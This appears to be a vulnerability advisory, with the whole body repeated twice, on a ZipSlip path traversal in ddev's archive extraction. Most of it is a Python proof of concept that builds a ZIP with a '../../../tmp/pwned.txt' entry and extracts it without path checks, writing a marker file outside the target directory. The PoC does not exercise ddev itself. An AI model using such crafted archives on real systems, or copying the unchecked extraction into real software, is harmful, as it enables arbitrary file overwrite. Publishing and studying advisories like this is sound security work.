Description
A ZipSlip path traversal vulnerability exists in the ddev/ddev project, affecting archive extraction routines. The issue allows a crafted ZIP archive to write files outside the intended extraction directory, potentially leading to arbitrary file overwrite on the host system.
Basic Information
ID
PACKETSTORM:219071
Published
Apr 17, 2026 at 00:00
Affected Product
Affected Versions
==================================================================================================================================
| # Title : ddev ZipSlip Path Traversal – Arbitrary File Write via Malicious Archive |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) — note: the PoC below is a self-contained Python simulation that never invokes ddev, so the browser is irrelevant to this issue, and its result check uses the POSIX path /tmp/pwned.txt |
| # Vendor : No standalone download available |
==================================================================================================================================
[+] Summary : A ZipSlip path traversal vulnerability exists in the ddev/ddev project, affecting archive extraction routines.
The issue allows a crafted ZIP archive to write files outside the intended extraction directory, potentially leading to arbitrary file overwrite on the host system as the user running the extraction. Note that the PoC below is a self-contained Python script that reproduces the unsafe join-without-validation pattern; it does not call ddev, so it demonstrates the bug class rather than exercising ddev's own extraction code, and no affected or fixed version is identified here.
[+] POC :
#!/usr/bin/env python3
import zipfile
import os
OUTPUT_ZIP: str = "exploit.zip"  # written to, and later read from, the current working directory
PAYLOAD_PATH: str = "../../../tmp/pwned.txt"  # entry name carrying '..' components: the traversal payload
PAYLOAD_CONTENT: str = "HACKED: ZipSlip successful!\n"  # marker written where the traversal lands
def create_malicious_zip():
    """Write OUTPUT_ZIP holding one entry whose name contains '..' components.

    The entry is named PAYLOAD_PATH and contains PAYLOAD_CONTENT. Any
    extractor that joins that name onto a destination directory without
    normalising the result and checking that it stays inside the
    destination will write the file outside it. The archive is created in
    the current working directory.
    """
    print("[*] Creating malicious ZIP...")
    with zipfile.ZipFile(OUTPUT_ZIP, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr(PAYLOAD_PATH, PAYLOAD_CONTENT)
    print(
        f"[+] Malicious archive created: {OUTPUT_ZIP}",
        f"[+] Payload path inside archive: {PAYLOAD_PATH}",
        sep="\n",
    )
def simulate_vulnerable_extract(dest):
    """Extract OUTPUT_ZIP into *dest* the unsafe way, on purpose.

    Mirrors the pattern the advisory attributes to ddev (a filepath.Join of
    the destination and the entry name with no check on the result): every
    entry name is joined onto *dest* and written as-is, so an entry such as
    PAYLOAD_PATH escapes *dest*. This is the vulnerable reference behaviour
    being demonstrated, not code to reuse; a safe extractor resolves the
    joined path and rejects it unless it stays under the resolved *dest*.
    OUTPUT_ZIP is read from the current working directory, and the function
    really does write wherever the entry names point.
    """
    print(f"\n[*] Simulating vulnerable extraction to: {dest}")
    with zipfile.ZipFile(OUTPUT_ZIP) as archive:
        for entry in archive.infolist():
            # Deliberately no normalisation and no containment check.
            out_path = os.path.join(dest, entry.filename)
            print(f"[!] Writing to: {out_path}")
            os.makedirs(os.path.dirname(out_path), exist_ok=True)
            data = archive.read(entry)
            with open(out_path, "wb") as out:
                out.write(data)
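def check_result(target=None):
    """Report whether the payload file landed outside the extraction directory.

    The original check looked only at the literal ``/tmp/pwned.txt``, but the
    extraction step writes PAYLOAD_PATH joined onto ``./safe_extract``, i.e.
    ``../../tmp/pwned.txt`` relative to the current working directory. The two
    coincide only when the script runs exactly two levels below the filesystem
    root, so the old check reported "Exploit failed" on most machines even
    though the file had been written.

    Args:
        target: path to test. When None, the location the PoC's extraction
            step actually writes to is computed (assumes the ``./safe_extract``
            destination used in ``__main__``).

    Returns:
        True if *target* exists (its contents are printed), False otherwise.
    """
    if target is None:
        target = os.path.normpath(os.path.join("./safe_extract", PAYLOAD_PATH))
    print("\n[*] Checking result...")
    if not os.path.exists(target):
        print("[-] Exploit failed")
        return False
    # Show the absolute location so the escape from the extraction dir is visible.
    print(f"[+] SUCCESS: File written Off the track: {os.path.abspath(target)}")
    with open(target, encoding="utf-8") as f:
        print("[+] Content:", f.read())
    return True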
if __name__ == "__main__":
    # WARNING: this really writes outside ./safe_extract (wherever PAYLOAD_PATH
    # resolves relative to the current directory); run it in a throwaway
    # directory or container.
    extract_dir = "./safe_extract"
    os.makedirs(extract_dir, exist_ok=True)
    create_malicious_zip()
    simulate_vulnerable_extract(extract_dir)
    check_result()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
| # Title : ddev ZipSlip Path Traversal – Arbitrary File Write via Malicious Archive |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) — note: the PoC below is a self-contained Python simulation that never invokes ddev, so the browser is irrelevant to this issue, and its result check uses the POSIX path /tmp/pwned.txt |
| # Vendor : No standalone download available |
==================================================================================================================================
[+] Summary : A ZipSlip path traversal vulnerability exists in the ddev/ddev project, affecting archive extraction routines.
The issue allows a crafted ZIP archive to write files outside the intended extraction directory, potentially leading to arbitrary file overwrite on the host system as the user running the extraction. Note that the PoC below is a self-contained Python script that reproduces the unsafe join-without-validation pattern; it does not call ddev, so it demonstrates the bug class rather than exercising ddev's own extraction code, and no affected or fixed version is identified here.
[+] POC :
#!/usr/bin/env python3
import zipfile
import os
OUTPUT_ZIP: str = "exploit.zip"  # written to, and later read from, the current working directory
PAYLOAD_PATH: str = "../../../tmp/pwned.txt"  # entry name carrying '..' components: the traversal payload
PAYLOAD_CONTENT: str = "HACKED: ZipSlip successful!\n"  # marker written where the traversal lands
def create_malicious_zip():
    """Write OUTPUT_ZIP holding one entry whose name contains '..' components.

    The entry is named PAYLOAD_PATH and contains PAYLOAD_CONTENT. Any
    extractor that joins that name onto a destination directory without
    normalising the result and checking that it stays inside the
    destination will write the file outside it. The archive is created in
    the current working directory.
    """
    print("[*] Creating malicious ZIP...")
    with zipfile.ZipFile(OUTPUT_ZIP, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr(PAYLOAD_PATH, PAYLOAD_CONTENT)
    print(
        f"[+] Malicious archive created: {OUTPUT_ZIP}",
        f"[+] Payload path inside archive: {PAYLOAD_PATH}",
        sep="\n",
    )
def simulate_vulnerable_extract(dest):
    """Extract OUTPUT_ZIP into *dest* the unsafe way, on purpose.

    Mirrors the pattern the advisory attributes to ddev (a filepath.Join of
    the destination and the entry name with no check on the result): every
    entry name is joined onto *dest* and written as-is, so an entry such as
    PAYLOAD_PATH escapes *dest*. This is the vulnerable reference behaviour
    being demonstrated, not code to reuse; a safe extractor resolves the
    joined path and rejects it unless it stays under the resolved *dest*.
    OUTPUT_ZIP is read from the current working directory, and the function
    really does write wherever the entry names point.
    """
    print(f"\n[*] Simulating vulnerable extraction to: {dest}")
    with zipfile.ZipFile(OUTPUT_ZIP) as archive:
        for entry in archive.infolist():
            # Deliberately no normalisation and no containment check.
            out_path = os.path.join(dest, entry.filename)
            print(f"[!] Writing to: {out_path}")
            os.makedirs(os.path.dirname(out_path), exist_ok=True)
            data = archive.read(entry)
            with open(out_path, "wb") as out:
                out.write(data)
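def check_result(target=None):
    """Report whether the payload file landed outside the extraction directory.

    The original check looked only at the literal ``/tmp/pwned.txt``, but the
    extraction step writes PAYLOAD_PATH joined onto ``./safe_extract``, i.e.
    ``../../tmp/pwned.txt`` relative to the current working directory. The two
    coincide only when the script runs exactly two levels below the filesystem
    root, so the old check reported "Exploit failed" on most machines even
    though the file had been written.

    Args:
        target: path to test. When None, the location the PoC's extraction
            step actually writes to is computed (assumes the ``./safe_extract``
            destination used in ``__main__``).

    Returns:
        True if *target* exists (its contents are printed), False otherwise.
    """
    if target is None:
        target = os.path.normpath(os.path.join("./safe_extract", PAYLOAD_PATH))
    print("\n[*] Checking result...")
    if not os.path.exists(target):
        print("[-] Exploit failed")
        return False
    # Show the absolute location so the escape from the extraction dir is visible.
    print(f"[+] SUCCESS: File written Off the track: {os.path.abspath(target)}")
    with open(target, encoding="utf-8") as f:
        print("[+] Content:", f.read())
    return True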
if __name__ == "__main__":
    # WARNING: this really writes outside ./safe_extract (wherever PAYLOAD_PATH
    # resolves relative to the current directory); run it in a throwaway
    # directory or container.
    extract_dir = "./safe_extract"
    os.makedirs(extract_dir, exist_ok=True)
    create_malicious_zip()
    simulate_vulnerable_extract(extract_dir)
    check_result()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================